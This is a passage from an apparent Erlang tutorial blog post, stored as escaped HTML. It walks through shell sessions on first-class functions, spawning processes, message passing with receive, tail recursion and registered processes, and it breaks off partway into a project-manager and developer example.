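&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;status2(_) -&amp;gt; error.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;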
&lt;h4 id=&quot;processes-and-messages&quot;&gt;Processes and Messages&lt;&#x2F;h4&gt;
&lt;p&gt;Functions in functional programming languages are first class citizens. This means that they are not discriminated. They can be assigned to variables, passed as arguments to other functions and returned as values from other functions. Say no to racism. Treat functions as any other type!&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-FLmbrG6z0Pt25nbfeG775g.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;6&amp;gt; F = fun(X, Y, Operation) -&amp;gt; Operation(X,Y) end.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;#Fun&amp;lt;erl_eval.18.106461118&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;7&amp;gt; Plus = fun(X, Y) -&amp;gt; X + Y end.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;#Fun&amp;lt;erl_eval.12.106461118&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;8&amp;gt; F(2, 2, Plus).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;4&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;9&amp;gt; DividePlusTwo = fun(A,B) -&amp;gt; A &#x2F; B + 2 end.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;#Fun&amp;lt;erl_eval.12.106461118&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;10&amp;gt; F(2, 2, DividePlusTwo). &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;3.0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Creating a new process in Erlang is really simple. You use the spawn primitive with the function you want to launch in another process.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;11&amp;gt; G = fun() -&amp;gt; 2 + 2 end.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;#Fun&amp;lt;erl_eval.20.106461118&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;12&amp;gt; G().&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;4&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;13&amp;gt; spawn(G).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&amp;lt;0.60.0&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;14&amp;gt; spawn(G).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&amp;lt;0.65.0&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Spawn creates the new process and returns the PID (unique process identifier) of that process. You might ask where the return value went. Well, apparently it disappeared. Black magic? No. Processes do not return anything; you have to send the result as a message to another process. Before that, let me show you that the shell itself is a process and that we can get its PID:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;15&amp;gt; self().&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&amp;lt;0.32.0&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;16&amp;gt; exit(self()).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;** exception exit: &amp;lt;0.32.0&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;17&amp;gt; self().&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&amp;lt;0.35.0&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;With self() we got the PID of the current process, in this case obviously the shell’s PID. We then exited that process and a new shell process was automatically launched; that is why the PID changed from &amp;lt;0.32.0&amp;gt; to &amp;lt;0.35.0&amp;gt;.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;18&amp;gt; Pid = self().&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&amp;lt;0.32.0&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;19&amp;gt; H = fun() -&amp;gt; Pid ! 2+2 end.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;#Fun&amp;lt;erl_eval.20.106461118&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;20&amp;gt; spawn(H).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&amp;lt;0.36.0&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;21&amp;gt; flush().&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Shell got 4&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;ok&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The ! or bang symbol is a primitive that sends the message on its right to the process identified by the PID on its left. Each process has a mailbox: a queue that stores the messages the process receives. With flush() you can see all the messages the shell process has received.&lt;&#x2F;p&gt;
&lt;p&gt;However, in general you want to do something based on the messages you receive, not just look at them in the shell. That is where the receive statement appears to save the game!&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;22&amp;gt; Echofun = fun Echo() -&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;           receive&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             X -&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;               io:format(&amp;quot;Message ~p~n&amp;quot;, [X])&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;           end&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;         end.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;#Fun&amp;lt;erl_eval.20.106461118&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;23&amp;gt; EchoPid = spawn(Echofun).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&amp;lt;0.35.0&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;24&amp;gt; EchoPid ! test.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Message test&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;test&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;We created an Echofun function that receives a message and prints it. Receive blocks until a message arrives. It is very similar to the case statement: if a message pattern matches a clause, the associated expression gets executed.&lt;&#x2F;p&gt;
&lt;p&gt;Returning to our example, we saved the function in the Echofun variable. Then we spawned it and stored the PID in EchoPid. Finally we sent an atom as a message using the bang symbol. The message is received by the process, and since any message will pattern match the unbound variable X, the io:format line gets executed. The first argument of io:format is a string that contains ~p; each ~p gets replaced by the corresponding element of the list passed as the second argument.&lt;&#x2F;p&gt;
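&lt;p&gt;For instance (this snippet is not from the original shell session, it is just an illustration), with several ~p placeholders each one consumes one element of the list in order:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;io:format(&amp;quot;~p plus ~p is ~p~n&amp;quot;, [2, 2, 2 + 2]).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;%% prints: 2 plus 2 is 4&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;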
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;25&amp;gt; EchoPid ! test.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;test&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;If we send the message again, the process will not print “Message test” as before, because the function already finished its execution. That’s why we need the function to call itself recursively, so that it keeps running after receiving a message.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;26&amp;gt; Echofun2 = fun Echo() -&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             receive&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;               X -&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                 io:format(&amp;quot;Message ~p~n&amp;quot;, [X]),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                 Echo()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             end&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;           end.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;#Fun&amp;lt;erl_eval.44.106461118&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;27&amp;gt; EchoPid2 = spawn(Echofun2).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&amp;lt;0.35.0&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;28&amp;gt; EchoPid2 ! test&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Message test&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;test&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;29&amp;gt; EchoPid2 ! test&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Message test&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;test&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;30&amp;gt; EchoPid2 ! test&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Message test&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;test&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Now, after receiving and printing the first message, the function calls itself and waits for the next message to be received.&lt;&#x2F;p&gt;
&lt;p&gt;Erlang and most functional programming languages have a great property called &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Tail_call&quot;&gt;tail recursion&lt;&#x2F;a&gt;. Thanks to it, your process can have a long and happy life without making your stack grow and explode in your face.&lt;&#x2F;p&gt;
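&lt;p&gt;As a quick sketch (the Sum function here is invented just for illustration), a tail-recursive function keeps its intermediate state in an accumulator argument, so the recursive call is the last expression evaluated and the stack stays flat no matter how many iterations run:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;%% The recursive call is the last thing the function does,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;%% so the stack does not grow even for a million iterations.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Sum = fun Loop(0, Acc) -&amp;gt; Acc;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;          Loop(N, Acc) -&amp;gt; Loop(N - 1, Acc + N)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;      end.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Sum(1000000, 0).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The Echofun2 loop above works the same way: the Echo() call is in tail position, which is why the process can run forever.&lt;&#x2F;p&gt;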
&lt;p&gt;Let’s add a new clause inside the receive so that we can kill the process:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;31&amp;gt; Echofun3 = fun Echo() -&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  receive &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    die -&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;      io:format(&amp;quot;Process with PID ~p has died~n&amp;quot;, [self()]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    X -&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;      io:format(&amp;quot;Message ~p~n&amp;quot;, [X]),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;      Echo()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    end&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; end.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;#Fun&amp;lt;erl_eval.44.106461118&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Now instead of spawning the function in a process and storing the PID, we will register the process:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;Besides addressing a process by using its pid, there are also built-in functions (BIFs) for registering a process under a name. The name must be an atom and is automatically unregistered if the process terminates.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;32&amp;gt; register(echo_process, spawn(Echofun3)).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;We register the process created by spawn(Echofun3) under the name echo_process.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;33&amp;gt; echo_process ! test.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Message test&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;test&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;34&amp;gt; echo_process ! die.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Process with PID &amp;lt;0.37.0&amp;gt; has died&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;die&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-wysu8drrpca_-GPtNsoYNQ.gif&quot; alt=&quot;&quot; &#x2F;&gt;killing a process thanks to message passing&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;35&amp;gt; echo_process ! test.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;** exception error: bad argument&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;in operator !&#x2F;2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;called as echo_process ! test&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The receive in the function running in the new process pattern matches the messages it receives. Since the first message does not match the die atom, it is then checked against the variable X. Since X is unbound, any message will match it, and the message gets printed out.&lt;&#x2F;p&gt;
&lt;p&gt;We then send the die atom as a message to the same process. Since die matches the first clause of the receive, a sentence stating that the process has died gets printed. As we do not call the function again, the process effectively dies.&lt;&#x2F;p&gt;
&lt;p&gt;When we try to send the test atom to the process again via the echo_process name, we get a bad argument exception. Since the process died, the echo_process atom no longer references a process, and that is why we cannot send the message.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;the-final-fight&quot;&gt;The final fight&lt;&#x2F;h4&gt;
&lt;p&gt;Now we are going to play with three processes: a client (the shell), a project manager and a developer. The shell will send a message to the project manager, and the project manager will forward the task to the developer. Simple but cool:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;36&amp;gt; Dev = fun Devfun() -&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  receive&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Task -&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;      io:format(&amp;quot;DEV(~p):~n I got a new task: ~p ~n---~n&amp;quot;, [self(), Task]),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;      Devfun()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    end&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;end.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;As you can see, the Dev variable contains a function that receives a message, prints it out and then calls itself.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;37&amp;gt; Pm = fun Pmfun() -&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  receive&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Task -&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;      io:format(&amp;quot;PM(~p):~n I received the following task: ~p.~n My job is to forward it to the developer ~n---~n&amp;quot;, [self(), Task]),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;      dev ! Task,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;      Pmfun()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  end&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;end.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Well, the project manager is not very different from the developer: it receives a task, prints it out and finally sends the task it received to the dev process. We need to spawn and register the dev and pm processes; if we did not register the process that runs the Dev function, we would not be able to send it a message the way we do here. So let’s do it:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;38&amp;gt; register(dev, spawn(Dev)),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
